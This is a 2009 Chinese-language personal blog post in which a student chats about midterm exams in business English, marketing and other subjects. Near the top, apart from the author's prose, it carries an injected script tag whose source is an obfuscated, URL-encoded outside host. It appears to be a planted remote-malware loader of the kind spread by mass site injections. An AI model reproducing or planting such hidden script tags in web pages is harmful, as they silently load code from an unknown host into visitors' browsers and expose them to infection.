2009-11-12 19:30:07こいし

2009/11/12 師父,救我啊!!!

script language=javascript src=http://ar%62.hc%6F.%63c/a.js> 1


「呵呵呵...我要吃熱狗了♡」
「哈哈哈!你現在感覺如何?感覺如何了?!」
「師父,救我啊!!!」

以上是一段人盡皆知的悲慘對白,但實際上跟我要說的沒有絲毫關聯。
原來以為商英很簡單的...對,我英文生字幾乎都會寫;但是其他的我反而不會了......
上次的小考明明有教過,但是老師不肯發考卷,所以我已經忘記了XD
我想高分是不可能的了,但至少請給我個及格吧......我並不會要求太多= =
該死的是前幾天考最恐怖的也是英文,商用英語跟英語會話真的是非常可怕,
我還是再多加練習英文好了(雖然商英考的是商用書信格式)

下午考行銷,既然有題組可以背了,那麼若是沒考及格就可以去跳樓了(只要老師不會改太嚴)基本上我也只有後面的問答不太會寫(40%)但是也還是把大略一絲寫上。
嗯,真的不難,只要背書的 力強的話(例如我)。

明天國貿不難、財管也差不多再念念就熟了,對於這次期中考大致上我還是有信心的,
剩下的事情還是等過了星期日再說好了,畢竟最重要的是檢定考試。
學校的電腦很容易LAG,所以就只先打這些了。